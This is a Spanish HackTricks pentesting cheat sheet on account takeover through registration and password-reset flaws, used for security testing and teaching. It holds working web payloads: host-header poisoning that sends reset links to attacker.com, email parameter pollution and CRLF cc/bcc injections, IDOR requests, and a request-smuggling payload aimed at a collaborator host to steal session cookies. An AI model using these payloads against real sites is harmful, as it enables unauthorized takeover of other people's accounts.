Registration & Takeover Vulnerabilities

Aprende y practica Hacking en AWS:HackTricks Training AWS Red Team Expert (ARTE) Aprende y practica Hacking en GCP: HackTricks Training GCP Red Team Expert (GRTE)

Apoya a HackTricks

Revisa los planes de suscripción!
Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live.
Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repos de github.

Toma de Control de Registro

Registro Duplicado

Intenta generar usando un nombre de usuario existente
Verifica variando el correo electrónico:
mayúsculas
+1@
añade algún punto en el correo
caracteres especiales en el nombre del correo (%00, %09, %20)
Pon caracteres en negro después del correo: test@test.com a
victim@gmail.com@attacker.com
victim@attacker.com@gmail.com

Enumeración de Nombres de Usuario

Verifica si puedes averiguar cuándo un nombre de usuario ya ha sido registrado dentro de la aplicación.

Política de Contraseñas

Al crear un usuario, verifica la política de contraseñas (verifica si puedes usar contraseñas débiles). En ese caso, puedes intentar hacer un ataque de fuerza bruta a las credenciales.

Inyección SQL

Revisa esta página para aprender cómo intentar tomas de control de cuentas o extraer información a través de Inyecciones SQL en formularios de registro.

Toma de Control de Oauth

OAuth to Account takeover

Vulnerabilidades de SAML

SAML Attacks

Cambiar Correo Electrónico

Cuando estés registrado, intenta cambiar el correo electrónico y verifica si este cambio es validado correctamente o si puedes cambiarlo a correos arbitrarios.

Más Comprobaciones

Verifica si puedes usar correos desechables
Contraseña larga (>200) conduce a DoS
Verifica los límites de tasa en la creación de cuentas
Usa username@burp_collab.net y analiza el callback

Toma de Control de Restablecimiento de Contraseña

Fuga de Token de Restablecimiento de Contraseña a Través del Referente

Solicita el restablecimiento de contraseña a tu dirección de correo electrónico
Haz clic en el enlace de restablecimiento de contraseña
No cambies la contraseña
Haz clic en cualquier sitio web de terceros (por ejemplo: Facebook, Twitter)
Intercepta la solicitud en el proxy de Burp Suite
Verifica si el encabezado referer está filtrando el token de restablecimiento de contraseña.

Envenenamiento de Restablecimiento de Contraseña

Intercepta la solicitud de restablecimiento de contraseña en Burp Suite
Agrega o edita los siguientes encabezados en Burp Suite: Host: attacker.com, X-Forwarded-Host: attacker.com
Reenvía la solicitud con el encabezado modificado http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com
Busca una URL de restablecimiento de contraseña basada en el encabezado host como: https://attacker.com/reset-password.php?token=TOKEN

Restablecimiento de Contraseña a Través del Parámetro de Correo Electrónico

# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com

IDOR en Parámetros de API

El atacante debe iniciar sesión con su cuenta y ir a la función Cambiar contraseña.
Inicie Burp Suite e intercepte la solicitud.
Envíelo a la pestaña de repetidor y edite los parámetros: ID de usuario/correo electrónico powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})

Token de Restablecimiento de Contraseña Débil

El token de restablecimiento de contraseña debe ser generado aleatoriamente y ser único cada vez. Intente determinar si el token expira o si siempre es el mismo; en algunos casos, el algoritmo de generación es débil y puede ser adivinado. Las siguientes variables podrían ser utilizadas por el algoritmo.

Marca de tiempo
ID de usuario
Correo electrónico del usuario
Nombre y apellido
Fecha de nacimiento
Criptografía
Solo números
Secuencia de token pequeña (caracteres entre [A-Z,a-z,0-9])
Reutilización de token
Fecha de expiración del token

Filtración del Token de Restablecimiento de Contraseña

Active una solicitud de restablecimiento de contraseña utilizando la API/UI para un correo electrónico específico, por ejemplo: test@mail.com
Inspeccione la respuesta del servidor y verifique resetToken
Luego use el token en una URL como https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]

Restablecimiento de Contraseña a Través de Colisión de Nombre de Usuario

Regístrese en el sistema con un nombre de usuario idéntico al nombre de usuario de la víctima, pero con espacios en blanco insertados antes y/o después del nombre de usuario. por ejemplo: "admin "
Solicite un restablecimiento de contraseña con su nombre de usuario malicioso.
Use el token enviado a su correo electrónico y restablezca la contraseña de la víctima.
Conéctese a la cuenta de la víctima con la nueva contraseña.

La plataforma CTFd era vulnerable a este ataque. Ver: CVE-2020-7245

Toma de Control de Cuenta a Través de Cross Site Scripting

Encuentre un XSS dentro de la aplicación o un subdominio si las cookies están limitadas al dominio principal: *.domain.com
Filtre la cookie de sesiones actual.
Autentíquese como el usuario utilizando la cookie.

Toma de Control de Cuenta a Través de HTTP Request Smuggling

1. Use smuggler para detectar el tipo de HTTP Request Smuggling (CL, TE, CL.TE) powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h 2. Elabore una solicitud que sobrescriba el POST / HTTP/1.1 con los siguientes datos: GET http://something.burpcollaborator.net HTTP/1.1 X: con el objetivo de redirigir a las víctimas a burpcollab y robar sus cookies. 3. La solicitud final podría verse como la siguiente

GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0

GET http://something.burpcollaborator.net  HTTP/1.1
X: X

Hackerone informa sobre la explotación de este error * https://hackerone.com/reports/737140 * https://hackerone.com/reports/771666

Toma de Control de Cuenta a través de CSRF

Crear un payload para el CSRF, p. ej: “Formulario HTML con envío automático para un cambio de contraseña”
Enviar el payload

Toma de Control de Cuenta a través de JWT

JSON Web Token puede ser utilizado para autenticar a un usuario.

Editar el JWT con otro ID de Usuario / Correo Electrónico
Verificar la firma débil del JWT

JWT Vulnerabilities (Json Web Tokens)

Referencias

https://salmonsec.com/cheatsheet/account_takeover

Aprende y practica Hacking en AWS:HackTricks Training AWS Red Team Expert (ARTE) Aprende y practica Hacking en GCP: HackTricks Training GCP Red Team Expert (GRTE)

Apoya a HackTricks

Revisa los planes de suscripción!
Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live.
Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repositorios de github.

PreviousRate Limit Bypass NextRegular expression Denial of Service - ReDoS

Last updated 3 days ago